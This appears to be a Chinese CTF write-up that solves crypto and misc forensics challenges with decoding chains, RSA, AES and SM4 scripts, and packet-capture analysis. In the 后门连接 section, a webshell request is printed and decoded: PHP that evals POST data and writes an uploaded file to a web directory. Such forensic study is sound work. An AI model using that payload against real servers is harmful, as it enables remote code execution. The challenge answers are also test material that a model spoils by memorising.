BTTETSWPA2E26SKMNSUIWJQLBEGO6SNNR4DITTKKZRWKRCNPFMEQZZSJZDHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFMY3FIRGXSWCIM4ZE23DYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SKMNSUITLZLBEGOMSNNR4DITL2KZRWKRCZPFMEQZ32JVWHQNCONJJGGZKEJV5FQSDHGJHFM6BUJV5EUY3FIRMXSWCIM55E23DYGRHGUSTDMVCE26SYJBTTETJRPA2E26SWMNSUIWJQLBEGO6SNGF4DITTKKZRWKRCNPFMEQZZSJVWHQNCNPJFGGZKELEYVQSDHPJGWY6BUJZVFEY3FIRGTCWCIM4ZE23DYGRGXUSTDMVCFSMCYJBTXUTLMPA2E42SSMNSUITL2LBEGOMSOKZ4DITL2JJRWKRCZPFMEQZ32JUYXQNCONJHGGZKEJUYVQSDHGJHEM6BUJV5E4Y3FIRMTCWCIM55E23DYGRHGUUTDMVCE26KYJBTTETSWPA2E26SKMNSUIWLZLBEGO6SNNR4DITTKJJRWKRCNPFMEQZZSJVWHQNCNPJFGGZKELEYVQSDHPJGWY6BUJZVFEY3FIRGXSWCIM4ZE4RTYGRGXUSTDMVCFSMCYJBTXUTLMPA2E42SSMNSUITLZLBEGOMSOIZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJJGGZKEJV4VQSDHGJHEM6BUJV5EUY3FIRMTAWCIM55E23DYGRHGUVTDMVCE26KYJBTTETSWPA2E26SWMNSUIWLZLBEGO6SNNR4DITTKKJRWKRCNPFMEQZZSJZDHQNCNPJFGGZKELEYFQSDHPJGWY6BUJZVFEY3FIRGXSWCIM4ZE4RTYGRGXUTTDMVCFSMKYJBTXUTLMPA2E42SKMNSUITL2LBEGOMSNGF4DITL2KZRWKRCZGBMEQZ32JUYXQNCONJLGGZKEJV4VQSDHGJHEM6BUJV5EUY3FIRMTAWCIM55E23DYGRHGUVTDMVCE2MKYJBTTETLMPA2E26SKMNSUIWJQLBEGO6SNNR4DITTKKJRWKRCNPJMEQZZSJZLHQNCNPJFGGZKELF4VQSDHPJGTC6BUJZVE4Y3FIRGTCWCIM4ZE4RTYGRGXUTTDMVCFSMKYJBTXUTLMPA2E42SSMNSUITLZLBEGOMSOIZ4DITL2JJRWKRCZGBMEQZ32JVWHQNCONJLGGZKEJV4VQSDHGJHEM6BUJV5EUY3FIRMTCWCIM55E2MLYGRHGUVTDMVCE26KYJBTTETSGPA2E26SKMNSUIWJQLBEGO6SOKZ4DITTKJJRWKRCNPFMEQZZSJZDHQNCNPJFGGZKELEYFQSDHPJGTC6BUJZVFMY3FIRGXSWCIM4ZE23DYGRGXUSTDMVCFS6KYJBTXUTLMPA2E42SKMNSUITL2LBEGOMSNGF4DITL2KZRWKRCZGBMEQZ32JUYXQNCONJLGGZKEJV4VQSDHGJHFCPJ5

base32解码

XHgzMlx4NjJceDM1XHg2Mlx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzNceDY1XHgzMlx4NjJceDMyXHg2Mlx4MzNceDYzXHgzNVx4NjRceDMzXHg2NVx4MzJceDYyXHgzMlx4NjVceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2NVx4MzJceDYyXHgzNVx4NjJceDMyXHg2NFx4MzNceDY1XHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzM1x4NjNceDM1XHg2NFx4MzNceDY1XHgzMlx4NjVceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2NVx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjVceDMzXHg2NVx4MzJceDY0XHgzNVx4NjJceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzM1x4NjVceDMyXHg2Mlx4MzNceDYzXHgzNVx4NjRceDMzXHg2NVx4MzJceDY1XHgzMlx4NjJceDMyXHg2Mlx4MzJceDY1XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY1XHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2NVx4MzJceDY0XHgzMlx4NjRceDMyXHg2NVx4MzJceDYyXHgzMlx4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NVx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2NVx4MzJceDYyXHgzMlx4NjVceDMyXHg2NVx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzVceDYyXHgzMlx4NjRceDMzXHg2NVx4MzJceDYyXHgzMlx4NjJceDMzXHg2M1x4MzVceDY0XHgzM1x4NjVceDMyXHg2NVx4MzVceDYyXHgzMlx4NjRceDMyXHg2NFx4MzNceDY1XHgzMlx4NjJceDMzXHg2M1x4MzVceDY0XHgzM1x4NjVceDMyXHg2NVx4MzJceDY0XHgzMlx4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDMyXHg2NFx4MzVceDYyXHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzNceDY1XHgzMlx4NjJceDMzXHg2M1x4MzVceDY0XHgzM1x4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDM1XHg2Mlx4MzJceDY0XHgzMlx4NjRceDMzXHg2NVx4MzJceDYyXHgzM1x4NjNceDM1XHg2NFx4MzNceDY1XHgzMlx4NjJceDMyXHg2NVx4MzJceDYyXHgzMlx4NjVceDM1XHg2Mlx4MzJceDY0XHgzM1x4NjVceDMyXHg2Mlx4MzJceDYyXHgzM1x4NjNceDM1XHg2NFx4MzNceDY1XHgzMlx4NjVceDM1XHg2Mlx4MzJceDY0XHgzMlx4NjRceDMzXHg2NVx4MzJceDYyXHgzM1x4NjNceDM1XHg2NFx4MzNceDY1XHgzMlx4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NVx4MzJceDY0XHgzMlx4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzVceDYyXHgzMlx4NjRceDMzXHg2NVx4MzJceDYyXHgzMlx4NjJceDMzXHg2M1x4MzVceDY0XHgzM1x4NjVceDMyXHg2Mlx4MzJceDY1XHgzMlx4NjRceDM1XHg2Mlx4MzJceDY0XHgzMlx4NjRceDMzXHg2NVx4MzJceDYyXHgzM1x4NjNceDM1XHg2NFx4MzNceDY1XHgzMlx4NjRceDMyXHg2NVx4MzJceDYyXHgzMlx4NjJceDMyXHg2Mlx4MzJceDY1XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDMyXHg2NVx4MzVceDYyXHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjRceDMyXHg2NFx4MzNceDY1XHgzMlx4NjJceDMzXHg2M1x4MzVceDY0XHgzM1x4NjVceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDM1XHg2Mlx4MzJceDY0XHgzMlx4NjRceDMzXHg2NVx4MzJceDYyXHgzM1x4NjNceDM1XHg2NFx4MzNceDY1XHgzMlx4NjRceDMyXHg2NFx4MzJceDY0XHgzMlx4NjVceDMyXHg2NFx4MzJceDY1XHgzM1x4NjVceDMyXHg2NFx4MzJceDY0XHgzNVx4NjJceDMyXHg2NFx4MzJceDY0XHgzM1x4NjVceDMyXHg2Mlx4MzJceDYyXHgzMlx4NjJceDMzXHg2M1x4MzVceDY0XHgzM1x4NjVceDMyXHg2NQ==

base64解码

\x32\x62\x35\x62\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x33\x65\x32\x62\x32\x62\x33\x63\x35\x64\x33\x65\x32\x62\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x65\x32\x62\x35\x62\x32\x64\x33\x65\x32\x62\x32\x62\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x65\x33\x65\x32\x64\x35\x62\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65\x32\x62\x32\x62\x32\x65\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x65\x32\x64\x32\x64\x32\x65\x32\x62\x32\x65\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x62\x32\x65\x32\x62\x32\x65\x32\x65\x32\x64\x32\x64\x32\x64\x32\x64\x32\x65\x32\x64\x32\x64\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x35\x62\x32\x64\x33\x65\x32\x62\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65\x35\x62\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65\x32\x64\x32\x65\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x65\x32\x64\x35\x62\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x64\x32\x64\x32\x65\x35\x62\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x62\x32\x65\x32\x62\x32\x65\x35\x62\x32\x64\x33\x65\x32\x62\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65\x35\x62\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65\x32\x64\x32\x64\x32\x64\x32\x65\x32\x64\x32\x65\x32\x64\x32\x64\x32\x65\x32\x62\x32\x62\x32\x62\x32\x62\x35\x62\x32\x64\x33\x65\x32\x62\x32\x62\x33\x63\x35\x64\x33\x65\x32\x62\x32\x65\x32\x64\x35\x62\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x64\x32\x65\x32\x62\x32\x62\x32\x62\x32\x65\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x32\x65\x32\x65\x35\x62\x32\x64\x32\x64\x32\x64\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x64\x32\x64\x32\x65\x35\x62\x32\x64\x32\x64\x33\x65\x32\x62\x33\x63\x35\x64\x33\x65\x32\x64\x32\x64\x32\x64\x32\x65\x32\x64\x32\x65\x33\x65\x32\x64\x32\x64\x35\x62\x32\x64\x32\x64\x33\x65\x32\x62\x32\x62\x32\x62\x33\x63\x35\x64\x33\x65\x32\x65

16进制转字符

2b5b2d2d2d2d2d2d2d2d2d3e2b2b3c5d3e2b2e2b2b2b2b2b2b2e2b5b2d3e2b2b2b3c5d3e2e2b2b2b2b2b2b2e2b2b2b2b2b2b2b2e3e2d5b2d2d2d2d2d3e2b3c5d3e2e2b2b2e2d2d2d2d2d2e2b2b2b2b2b2b2b2e2d2d2e2b2e2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2e2b2e2e2d2d2d2d2e2d2d2e2b2b2b2b5b2d3e2b2b3c5d3e2e5b2d2d3e2b3c5d3e2e2d2e2d2d2d2d2d2e2d5b2d2d2d2d2d3e2b3c5d3e2d2d2e5b2d2d3e2b3c5d3e2b2e2b2e5b2d3e2b2b3c5d3e2e5b2d2d3e2b3c5d3e2e2d2d2d2e2d2e2d2d2e2b2b2b2b5b2d3e2b2b3c5d3e2b2e2d5b2d2d3e2b3c5d3e2d2e2b2b2b2e2d2d2d2d2d2d2d2d2d2e2e5b2d2d2d2d2d3e2b3c5d3e2d2d2e5b2d2d3e2b3c5d3e2d2d2d2e2d2e3e2d2d5b2d2d3e2b2b2b3c5d3e2e
+[--------->++<]>+.++++++.+[->+++<]>.++++++.+++++++.>-[----->+<]>.++.-----.+++++++.--.+.------.++++++++.+..----.--.++++[->++<]>.[-->+<]>.-.-----.-[----->+<]>--.[-->+<]>+.+.[->++<]>.[-->+<]>.---.-.--.++++[->++<]>+.-[-->+<]>-.+++.---------..[----->+<]>--.[-->+<]>---.-.>--[-->+++<]>.

brainfuck解密后获得flag。

6、降龙十八掌

少侠,看你骨骼精奇,在此传你一套降龙十八掌!

以醯夷哆勝皤即栗佛諳沙哆明摩缽娑除哆涅室諳僧皤三梵沙無怯心槃梵盡沙耨梵神梵提呐跋南栗爍冥伊呐盧俱至道盧夢波都室竟罰孕諳利那奢特真喝知俱滅哆利蒙菩舍皤都諳僧滅奢盡參侄除般侄等哆耨梵即侄佛大諳都諳孕集皤彌梵漫娑俱勝利不切呐得所皤陀盧闍依皤心缽伽曰離跋參諳亦侄室俱波怯夷奢提奢顛罰所死俱曳梵穆俱悉三諳藝奢姪瑟俱夢呐知冥道切顛罰顛以梵寫盧罰殿一僧

与佛论禅解密

MzkuM8fmZTL7MJH6LGIxBJV7L7V6ZJR5BJMyLGN7LzRkAwL7MU5=

直接base解码解不出,跟据题目考虑先进行ROT18解码

ZmxhZ3szMGY2ZWU1YTVkOWI2Y2I1MWE0OWZlYTA2YmExNjY2ZH0=

再进行base64获得flag。

7、RSA1

在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17 求解出d。d的md5值即flag

用Rsa Tools计算D即可

8、贝斯?

..--..--..-..---..----.-..--...-....-..-.--...--..-....-...-...-.-.....-....--.-..-....-...-.-.-.-.....-..-.-..-..-...---..-----...-...-.-.....-..---.---..---.-..-...--.-.....--..--.--.-.....-..----.--..-.-.-..---..-..-.--.-..-.--.-.....-.

因为没有分隔符,无法使用摩斯解密,转为对应0和1,二进制转16进制之后转ascii获得flag

9、RAS

p = 0x3B6311745B1BD50F111D171CC1D5A7FBBFABCBB
q = 0x2B5FDF7118A38EFB3B4F2A0D4E6130E520DD2F9
e = 0x1224B6ADFDD2F4C4350713196000258F5C7D193FACE19E484E027BA4351B796523DF4DCB2CAE5
c = [
0x268BDF69E55B075E519108349569B951FD7FA62B0D9088B476BB66D5CB04630F525CD2B33A3F3,
0x6A1E9C448AD5742B8FCF4F73179C3D1614263000B85EC499BC9E941C95703B8DD7CC21EA77975,
0x7BB14144E91EC9106B1C5CD878F507A07FFAEE4B7B092271DEAA7E5B6EF47FB3FA84425F6D375,
0x8E6D08C60928CA8A65FC971E24C80F256678F476BD2DB28D7174E398C0D81EBF8A20C1FB76B9D,
0x529D680E0851D069FBDF74E81CF20B369CEC53238486C106E0CC0E8741E6C25814DD4ECB28047,
0x805AD716FD54C6FA0D9A162B30055B1C469E37AF7D77C5A71532320AAF47F300C95619A6CCA21,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x74CCD34986604C0305D16FE7FEB7D40C757990DBCFBBC97E8A8C21A266EAD33E9245ABE8EDF9B,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x74CCD34986604C0305D16FE7FEB7D40C757990DBCFBBC97E8A8C21A266EAD33E9245ABE8EDF9B,
0x805AD716FD54C6FA0D9A162B30055B1C469E37AF7D77C5A71532320AAF47F300C95619A6CCA21,
0x673A6BEB5E9AFD0BABB9D3D088C226B4FA1D23ADAECC74E2EF45DCEB9C3949E0456188D41F973,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x92B1493A164638E670FE0CB043FC253FCAEAD763776FCBDF987E54AE894DFCC13692BBEE9C29,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x8B4AC0EF0669E4DFA2E24F96528BCFB8168566FD5FB2DCC1E9DE413DA768258E759C9A073D832,
0x805AD716FD54C6FA0D9A162B30055B1C469E37AF7D77C5A71532320AAF47F300C95619A6CCA21,
0x673A6BEB5E9AFD0BABB9D3D088C226B4FA1D23ADAECC74E2EF45DCEB9C3949E0456188D41F973,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x51585D5C3733CE1FA91F7E8722C0A29934B8B12C98B634AABFD126AC2BED5C1A5754EB3A5276D,
0x673A6BEB5E9AFD0BABB9D3D088C226B4FA1D23ADAECC74E2EF45DCEB9C3949E0456188D41F973,
0x92B1493A164638E670FE0CB043FC253FCAEAD763776FCBDF987E54AE894DFCC13692BBEE9C29,
0x7C04B76E88FDF069BB729410E91792BA182F4CFAA5D2FA7A7829BD9740B78E664C12A784949F0,
]

已知PQ,先算D后解密C获得flag。

10、变异的凯撒

密文:afZ_r[[X+*(ShTRdOO`ZLJHRYNLLAOM?=;Q;AS

凯撒一键解码,在key3 #5获得flag

11、Xor_2

题目大概错了,后续更新再补

12、凯撒?替换?呵呵!

MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO}

https://quipqiup.com/直接词频分析暴力解密

flag substitution cipher decryption is always easy just like a piece of cake

13、奇怪的指令

以下是某国现任总统外发的一段指令,经过一种奇异的加密方式,毫无规律,看来只能分析了。请将这段语句还原成通顺语句,并从中找到key作为答案提交,答案是32位,包含小写字母。

VIZZB IFIUOJBWO NVXAP OBC XZZ UKHVN IFIUOJBWO HB XVIXW XAW VXFI X QIXN VBD KQ IFIUOJBWO WBKAH NBWXO VBD XJBCN NKG QLKEIU DI XUI VIUI DKNV QNCWIANQ XN DXPIMKIZW VKHV QEVBBZ KA XUZKAHNBA FKUHKAKX XAW DI VXFI HBN QNCWIANQ NCAKAH KA MUBG XZZ XEUBQQ XGIUKEX MUBG PKAWIUHXUNIA NVUBCHV 12NV HUXWI XAW DI XUI SCQN QB HZXW NVXN XZZ EBCZW SBKA CQ NBWXO XAW DI DXAN NB NVXAP DXPIMKIZW MBU JIKAH QCEV XA BCNQNXAWKAH VBQN HKFI OBCUQIZFIQ X JKH UBCAW BM XLLZXCQI XAW NVI PIO KQ 640I11012805M211J0XJ24MM02X1IW09

同样使用quipquip

HELLO EVERYBODY THANK YOU ALL RIGHT EVERYBODY GO AHEAD AND HAVE A SEAT HOW IS EVERYBODY DOING TODAY HOW ABOUT TIM SPICER WE ARE HERE WITH STUDENTS AT WAKEFIELD HIGH SCHOOL IN ARLINGTON VIRGINIA AND WE HAVE GOT STUDENTS TUNING IN FROM ALL ACROSS AMERICA FROM KINDERGARTEN THROUGH 12TH GRADE AND WE ARE JUST SO GLAD THAT ALL COULD JOIN US TODAY AND WE WANT TO THANK WAKEFIELD FOR BEING SUCH AN OUTSTANDING HOST GIVE YOURSELVES A BIG ROUND OF APPLAUSE AND THE KEY IS 640E11012805F211B0AB24FF02A1ED09

14、AES—mess

We encrypted a flag with AES-ECB encryption using a secret key, and got the hash: e220eb994c8fc16388dbd60a969d4953f042fc0bce25dbef573cf522636a1ba3fafa1a7c21ff824a5824c5dc4a376e75 However, we lost our plaintext flag and also lost our key and we can't seem to decrypt the hash back :(. Luckily we encrypted a bunch of other flags with the same key. Can you recover the lost flag using this?

[HINT] There has to be some way to work backwards, right?

通过给出的aes,与密文对比获得flag

32个字符(16个字)分一栏,获得分割后的结果

e220eb994c8fc16388dbd60a969d4953
f042fc0bce25dbef573cf522636a1ba3
fafa1a7c21ff824a5824c5dc4a3

每一栏在密文中查找,获得对应的16个字符

abctf{looks_like_gospel_feebly}:e220eb994c8fc16388dbd60a969d4953   6d896bd7d6da9c4ce3eac5e4832c2f64

abctf{verism_evg_you_can_break_ajugas}:528c30c67c57968fa131684d07c1fa9cf042fc0bce25dbef573cf522636a1ba3c0bd6ceeec8e817f1be7b09a9a8b0fb8

abctf{eocene_fazes}:b58b970036b3a521a314d06f1436863efafa1a7c21ff824a5824c5dc4a376e75

截取对应位置获得flag abctf{looks_like_you_can_break_aes}

15、AES

c = YC0ky5H1iE/1yvolTcavHPt8cla5DakNyXBlET1QXbnxQm3u7VVHlZjUc5XzVH6grI5HOoYPab0v\neu/TDaAPtg==
key = ThisIsASecretKey
c = AES.ecb(key,flag)

使用AEC-ECB解码即可

16、猜猜我是谁

LQGSK6GUJWNAK4GOJMIIG=J2NWURVU5MJWEMJUZ25TA=WC2SYDMLKCVLYSGLWKMS6=X2GEUHX2GOT2ENUXVNTYQ=

规则四等分,考虑4栏栅栏

分为4栏时,解密结果为:LJWXQ2C2GN2GSWSEKUYU6RDHGVMXUUL2J5KGWMCONJVTAWL2KEYE4MSNGJGUOULXJZWVM2KNI5MTITSYGA6Q====

base32后base64解码获得flag

17、des-ecb

待做

18、crpher

ciphertext.encode('hex') = 1f1a100d1e5c504d1e425d10424e561e0a575e5314570b4557050a584c12545b421b50584344524e5312

ciphertext[x] = flag[x] ^ key[x]

enc(key,iv) = rhiknfxeuyhlcresrvblabmmdppntznqzwqijjnvgo

key tips :
enc function is similar to Virginia;
The length of iv is 5;
iv consists of 5 charcters c,r,y,p,t

IV是由crypt五个字母组成的向量,与key加密后获得某个字符串,已知flag的头固定格式为flag{,因此与ciphertext前五位1f 1a 10 0d 1e异或后可以得到key的前五位:yvqje

text=[0x1f,0x1a,0x10,0x0d,0x1e]
flag="flag{"
temp=""
for i in range(0,5):
    temp+=chr(text[i] ^ ord(flag[i]))
print(temp)

crypt的组合对rhikn进行弗吉尼亚密码解密推不出yvqje,因此考虑博福特密码,可知iv为pcytr

解出key为yvqjekfuztirwcnxldsgpbmhoanlascmzxbhtpgwjo

异或获得答案

text=[0x1f,0x1a,0x10,0x0d,0x1e,0x5c,0x50,0x4d,0x1e,0x42,0x5d,0x10,0x42,0x4e,0x56,0x1e,0x0a,0x57,0x5e,0x53,0x14,0x57,0x0b,0x45,0x57,0x05,0x0a,0x58,0x4c,0x12,0x54,0x5b,0x42,0x1b,0x50,0x58,0x43,0x44,0x52,0x4e,0x53,0x12]

flag=""
key="yvqjekfuztirwcnxldsgpbmhoanlascmzxbhtpgwjo"
for i in range(0,len(key)):
    flag+=chr(text[i]^ord(key[i]))
print(flag)

19、ezsm

# -*- coding: utf-8 -*-
import binascii
from gmssl import sm4
from secret import flag

def encode(key, data):
    sm4_a = sm4.CryptSM4()
    sm4_a.set_key(key.encode(), sm4.SM4_ENCRYPT)
    ciphertext = sm4_a.crypt_ecb(str(data).encode()).hex()
    return ciphertext

if __name__ == '__main__':
    key = '4765?df?0170?44?'
    ciphertext = encode(key,flag)
    print('密文',ciphertext)


#c49f4552b22f27969c07d9371d1aa093b54f97ccd44261a5fc92cd3461a38d68d20218a51686a3f9d0cc50679e36cd4f

key中存在4个不确定位,通过代码尝试所有字符,暴力检索flag关键字即可

from gmssl import sm4
from Crypto.Util.number import *

def encode(key, data):
    sm4_a = sm4.CryptSM4()
    sm4_a.set_key(key.encode(), sm4.SM4_ENCRYPT)
    ciphertext = sm4_a.crypt_ecb(str(data).encode()).hex()
    return ciphertext

def decode(key, data):
    sm4_a = sm4.CryptSM4()
    sm4_a.set_key(key.encode(), sm4.SM4_DECRYPT)
    text = sm4_a.crypt_ecb(long_to_bytes(data))
    return text

if __name__ == '__main__':
    l = [0,1,2,3,4,5,6,7,8,9,'a','b','c','d','f']
    for i in l:
        for n in l:
            for m in l:
                for j in l:
                    key = f'4765{i}df{n}0170{m}44{j}'
                    ciphertext = 0xc49f4552b22f27969c07d9371d1aa093b54f97ccd44261a5fc92cd3461a38d68d20218a51686a3f9d0cc50679e36cd4f
                    text = decode(key,ciphertext)
                    if b'flag{' in text:
                        print(text)

20、这里什么都没有

在word的信息里面可以看到提示为3DES-ECB

key:deluipuhgfnbcxsw

密文:2qnss1sp48698op36o2q343sps9o7p0690s4r9s560or51qsnrqopsn8592439pno63695072qos1p3r

通过在线工具解密获得flag https://the-x.cn/cryptography/TripleDes.aspx

Misc

1、wireshark

黑客通过wireshark抓包管理员登录网站的一段流量包(管理员的密码即是答案)。注意:flag提交格式为flag{xxx}。

搜索password即可

2、logon

抓取到了管理员的登录信息,你能从中获得管理员的登录密码吗? 注意:管理员的密码即是flag

搜索password后进行URL解码

3、ping

管理员抓取到网络中一段ping的流量,你能帮他从中获取flag吗?

每个请求最后有一个字符,拼接起来即可

4、telnet

管理员抓取到一段流量,你能从中找出flag吗?

搜索flag即可

5、sublime

直接检索flag,URL解码即可

6、meinv.jpg

你能发现图片中隐藏的信息吗

在属性里面找到信息

7、Fonts

通过文本编辑器打开可找到flag

8、眼见非实

解压后在xml文件里找到flag

9、ameng.jpg

猫猫叹气,你能从中找到它为什么叹气吗

用Stegslove发现图片还有第二帧

10、goodguys

用010editor打开在结尾存在flag

11、blue

红蓝纷争开始了

跟据题目提示,在蓝色通道进行数据提取,获得flag

12、Virtual

压缩包例题-掩码攻击得到的密码即是答案

跟据提示,需要进行掩码攻击,使用010editor查看文件尾部获得掩码,爆破即可。

13、sound

查看频谱图获得flag

14、提取

黑客利用文件传输密钥信息,请找出黑客传输的密钥。 注意:flag提交格式为flag{xxx}

过滤http流,发现传输文件,分别导出导出分组字节流。

获得4327.png与keykey.rar。

用图片中的密码打开压缩包获得flag

15、ssl

题目给了一个key文件,在wireshark中添加文件来解密TLS

解密后正常查看HTTP流获得key

16、findtheflag

还没做

17、流量解密

查看HTTP流获得synt{5r8qo5982rn88568o8n1s8rr8q061609},ROT13解密获得flag

18、UP

直接搜索flag

19、2的平方

还不会

20、zip伪加密

将50 4B 01 02块的加密位改为偶数即可解压

21、一起来看图

给了一个不会动的gif,用010editor打开发现没有gif文件头,补全头部47 49 46 38后逐帧拼接flag

22、后门连接

查看流量文件,发现传输了一些文件

在对应请求中导出File Data的分组字节流,可以获得hello.rar,得到flag前半段

另一段菜刀代码解密之后发现

&cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXEFwcFNlcnZcXHd3d1xcZmlsZXNcXHdvcmxkLnBuZw%3D%3D&z2=

解码获得
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();

z1=C:\\AppServ\\www\\files\\world.png

考虑z2是传输的world.png,同时z2开头为89504E47,符合PNG头文件。把值创建为十六进制文件,打开图片获得flag后半段。

23、瞒天过海

给了一个没有后缀名的文件,丢进010editor发现有wireshark字样。

用wireshark打开后发现可以导出flag.rar,但是需要密码

尝试搜索password,找到一段可疑TCP流。

[root@localhost wireshark]# ls
1  2  3  test
[root@localhost wireshark]# cat 1
Rar!....3...
.............TU..<..... .+......flag.txt0.....n.Kr..z....uEo.Bn&=i.S..>....4.B..~...xj.".
...u......3.....jWj..%m..!.+h...+s..q#.]...3Ks.y.....r.2...wVQ....[root@localhost wireshark]# cat 2
19aaFYsQQKr+hVX6hl2smAUQ5a767TsULEUebWSajEo=[root@localhost wireshark]# ping baidu.com
PING baidu.com (111.13.101.208) 56(84) bytes of data.
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=1 ttl=48 time=33.4 ms
